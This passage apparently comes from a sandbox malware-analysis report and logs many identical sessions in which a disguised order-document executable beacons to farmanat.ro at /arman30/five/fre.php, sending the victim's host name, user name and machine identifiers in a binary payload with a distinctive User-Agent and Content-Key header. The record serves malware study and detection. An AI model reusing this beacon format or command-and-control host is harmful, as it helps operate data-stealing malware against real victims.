                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              227192.168.11.2050069176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:06.194184065 CET6636OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:06.227742910 CET6636OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:06.284095049 CET6636INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:05 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              228192.168.11.2050070176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:06.671276093 CET6637OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:06.705171108 CET6637OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:06.754846096 CET6638INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:05 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              229192.168.11.2050071176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:07.189424038 CET6638OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:07.222987890 CET6639OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:07.292504072 CET6639INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:06 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              23192.168.11.2049858176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:16.437510014 CET6337OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:16.471724033 CET6337OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:16.523509979 CET6337INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:15 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              230192.168.11.2050072176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:07.699299097 CET6640OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:07.733006954 CET6640OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:07.791333914 CET6640INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:06 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              231192.168.11.2050073176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:08.201999903 CET6641OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:08.236202002 CET6641OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:08.296416998 CET6642INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:07 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              232192.168.11.2050074176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:08.706878901 CET6642OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:08.741132021 CET6643OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:08.799254894 CET6643INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:07 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              233192.168.11.2050075176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:09.222779989 CET6644OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:09.256258965 CET6644OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:09.311629057 CET6644INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:08 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              234192.168.11.2050076176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:09.674115896 CET6645OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:09.708259106 CET6645OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:09.757879019 CET6646INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:08 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              235192.168.11.2050077176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:10.188350916 CET6646OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:10.221869946 CET6647OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:10.274288893 CET6647INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:09 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              236192.168.11.2050078176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:10.703556061 CET6648OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:10.737229109 CET6648OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:10.788405895 CET6648INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:09 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              237192.168.11.2050079176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:11.205022097 CET6649OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:11.239279032 CET6649OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:11.291445017 CET6650INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:10 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              238192.168.11.2050080176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:11.714368105 CET6650OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:11.748078108 CET6651OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:11.797611952 CET6651INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:10 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              239192.168.11.2050081176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:12.226092100 CET6652OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:12.260006905 CET6652OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:12.310113907 CET6652INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:11 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              24192.168.11.2049859176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:17.100651979 CET6338OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:17.135035992 CET6338OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:17.190354109 CET6339INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:16 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              240192.168.11.2050082176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:12.706710100 CET6653OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:12.740931034 CET6653OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:12.797348022 CET6654INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:11 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              241192.168.11.2050083176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:13.215744972 CET6654OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:13.250005007 CET6655OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:13.300825119 CET6655INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:12 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              242192.168.11.2050084176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:13.714873075 CET6656OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:13.749361038 CET6656OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:13.806813955 CET6656INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:12 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              243192.168.11.2050085176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:14.199511051 CET6657OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:14.233372927 CET6657OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:14.290170908 CET6658INHTTP/1.1 404 Not Found
                                              Server: nginx
